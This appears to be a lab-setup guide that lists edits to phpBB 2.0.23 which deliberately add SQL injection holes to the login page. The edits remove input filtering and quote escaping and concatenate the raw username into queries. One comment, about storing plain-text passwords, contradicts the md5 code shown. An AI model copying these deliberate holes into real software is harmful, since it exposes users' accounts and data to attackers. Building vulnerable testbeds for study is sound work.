The following works in phpBB 2.0.23, the line numbers are based on original phpBB2 source files.

I Goal: Modify the source code of phpBB2 to introduce SQL injection vulnerability(PostgreSQL only) to 'username' input textbox on login.php.

Note: the modification is ordered by the security check sequence done by phpBB.

1. templates/subSilver/login_body.tpl line 22:
maxlength="40" -> maxlength="80"
# This is to enlarge the input length, so we can input more complicated malicious string.

2. includes/functions.php line 80:
0, 25); -> 0, 80);
# Same as above, enlarge the legal input length.

3. includes/functions.php line 81,82:
comment out these two lines.
# these two lines are to filter the string to prevent SQL injection.

4. login.php line 62:
WHERE username = '" . str_replace("\\'", "''", $username) . "'"; ->
WHERE username = '" . $username. "'";
# this is the last line of defending from SQL injection attack.

II Goal: Modify the source code of phpBB2 to introduce SQL injection vulnerability(for PostgreSQL and MYSQL) to login.php.

# The following modifications is to save the password as plain text, instead of hashing it. For consistancy, we assume you've done the above modifications.


1. login.php line 90:
replace line 90 to following 9 lines:
$sql_checkpasswd = "SELECT user_id, username, user_password, user_active, user_level, user_login_tries, user_last_login_try
		FROM " . USERS_TABLE . "
		WHERE username = '" . $username . "'" . " AND user_password = '" . md5($password) . "'";
if ( !($result_checkpasswd = $db->sql_query($sql_checkpasswd)) )
{
	    message_die(GENERAL_ERROR, 'Error in obtaining userdata', '', __LINE__, __FILE__, $sql);
}
$row = $db->sql_fetchrow($result_checkpasswd);
if( $row && $row['user_active'] )